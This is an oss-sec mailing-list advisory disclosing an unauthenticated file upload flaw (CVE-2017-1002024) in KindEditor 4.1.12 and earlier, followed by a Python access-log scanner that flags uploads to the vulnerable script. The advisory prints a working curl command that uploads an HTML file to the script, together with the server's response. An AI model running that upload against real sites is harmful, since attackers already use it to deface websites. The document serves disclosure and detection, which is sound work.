oss-sec mailing list archives
File upload vulnerability in Kindeditor <= 4.1.12
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 05 Jul 2017 11:22:54 -0400
Title: File upload vulnerability in Kindeditor <= 4.1.12
Author: Larry W. Cashdollar, @_larry0
Date: 2017-06-14
CVE-ID: [CVE-2017-1002024]
Download Site: http://kindeditor.org/ https://github.com/kindsoft/kindeditor/
Vendor: KindSoft
Vendor Notified: 2017-06-15
Vendor Contact:
Advisory: http://www.vapidlabs.com/advisory.php?v=195

Description:
KindEditor is a lightweight, Open Source (LGPL), cross browser, web based WYSIWYG HTML editor. KindEditor has the ability to convert standard text areas to rich text editing.

Vulnerability:
It appears there is a remote file upload vulnerability in kindeditor <= 4.1.12, specifically in kindeditor/php/upload_json.php. The file doesn't sanitize user input or check that a user should be uploading files to the system. It appears it doesn't allow .php, .phtml, .shtml or other executable extensions. You can upload .html and call it as it is uploaded to the web server path, but there is no server side code exec.

Exploit Code:
A simple curl request to kindeditor/php/upload_json.php?dir=file with the data filename=test.html set via POST request is all that's required to exploit this vulnerability:

  $ curl -F "imgFile=@test.html" http://example.com/kindeditor/php/upload_json.php?dir=file

  {"error":0,"url":"/kindeditor/php/../attached/file/20170613/20170613203236_37481.html"}

This vulnerability is being actively exploited in the wild to deface sites. The software vendor has not responded to the issue I posted three weeks ago.
https://github.com/kindsoft/kindeditor/issues/249
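The advisory above gives defenders two observable signals: an unauthenticated POST to kindeditor/php/upload_json.php, and an uploaded .html file later being fetched from the attached/ directory. The following access-log scanner is an added example, not part of the advisory or the KindEditor project; the log lines are constructed, and the endpoint and directory names are taken from the advisory's curl example.

```python
import re
from os.path import splitext
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

UPLOAD_ENDPOINT = "/kindeditor/php/upload_json.php"  # the vulnerable script named in the advisory
UPLOAD_DIR = "/attached/"                            # where the advisory's response URL lands
# Extensions the script still accepts but that allow defacement (assumption: extend per site).
RISKY_EXTS = {".html", ".htm"}

def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry):
    """Tag one parsed request, or return None if it needs no attention."""
    url = urlsplit(entry["path"])
    if entry["method"] == "POST" and url.path == UPLOAD_ENDPOINT:
        return "upload_attempt"          # POST to the upload handler (no auth check in <= 4.1.12)
    ext = splitext(url.path)[1].lower()
    if entry["method"] == "GET" and UPLOAD_DIR in url.path and ext in RISKY_EXTS:
        return "risky_upload_served"     # an uploaded .html page being fetched from the web root
    return None

def scan(lines):
    """Return (ip, path, tag) for every request an analyst should look at."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tag = classify(entry)
        if tag:
            findings.append((entry["ip"], entry["path"], tag))
    return findings

# Constructed sample log lines (not real traffic); the second path is the one from the advisory.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Jun/2017:20:32:36 +0000] "POST /kindeditor/php/upload_json.php?dir=file HTTP/1.1" 200 96 "-" "curl/7.54.0"',
    '198.51.100.4 - - [13/Jun/2017:20:33:01 +0000] "GET /attached/file/20170613/20170613203236_37481.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [13/Jun/2017:20:35:10 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, tag in scan(SAMPLE_LOG):
        print(f"{tag:22} {ip:15} {path}")
```

A POST to the endpoint from a client that never authenticated to the CMS is the higher-confidence signal; the served-.html rule mainly helps find sites that were already defaced before logging was reviewed.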